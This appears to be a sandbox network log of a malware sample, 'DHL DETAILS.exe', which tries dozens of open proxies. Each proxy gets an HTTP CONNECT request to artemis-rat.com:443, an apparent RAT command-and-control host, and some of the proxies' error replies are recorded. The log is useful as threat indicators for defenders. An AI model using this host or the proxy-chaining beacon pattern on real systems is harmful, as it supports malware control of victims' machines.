Mar 9, 2024 13:14:20.535192966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1714	192.168.2.5	55179	103.66.177.17	32251	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.535984039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1715	192.168.2.5	55202	52.172.1.186	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.535985947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1716	192.168.2.5	53358	220.194.189.144	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.543452978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1717	192.168.2.5	55224	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.543584108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1718	192.168.2.5	55119	222.138.76.6	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.544259071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.000955105 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1719	192.168.2.5	54446	201.144.20.231	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.562855959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1720	192.168.2.5	55153	178.128.113.118	23128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.569473982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.033972979 CET	1286	IN	HTTP/1.1 502 Bad Gateway Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3693 X-Squid-Error: ERR_CONNECT_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1721	192.168.2.5	55229	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.580051899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1722	192.168.2.5	55051	39.165.0.137	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.619497061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.266220093 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:21 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1723	192.168.2.5	55016	111.53.178.249	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.627140999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1724	192.168.2.5	55236	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.633778095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1725	192.168.2.5	51132	163.172.131.178	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.634094000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.973947048 CET	536	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1726	192.168.2.5	53761	72.49.49.11	31034	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.635301113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1727	192.168.2.5	55230	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.638618946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1728	192.168.2.5	54017	206.220.175.2	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.647192955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1729	192.168.2.5	55231	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.652352095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1730	192.168.2.5	55233	185.38.111.1	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.653266907 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:20.974342108 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Length: 0
Mar 9, 2024 13:14:21.298830986 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1731	192.168.2.5	50996	103.126.219.37	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.654544115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.056550980 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1732	192.168.2.5	54562	159.223.71.71	59243	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.672840118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.364722013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.380240917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1733	192.168.2.5	55238	171.250.222.13	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.704457998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.520788908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1734	192.168.2.5	52064	199.58.185.9	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.716902971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1735	192.168.2.5	55234	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.733798027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1736	192.168.2.5	55247	38.54.101.254	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.736210108 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1737	192.168.2.5	55237	106.105.218.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.737844944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1738	192.168.2.5	55223	123.241.210.123	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.752496958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.226191998 CET	326	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1739	192.168.2.5	53605	164.92.86.113	60283	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.778981924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1740	192.168.2.5	51164	54.36.122.16	17188	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.782305002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1741	192.168.2.5	53610	147.124.212.31	4671	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.797590971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1742	192.168.2.5	54651	45.191.75.186	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.801628113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1743	192.168.2.5	55097	117.160.250.132	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.822427988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
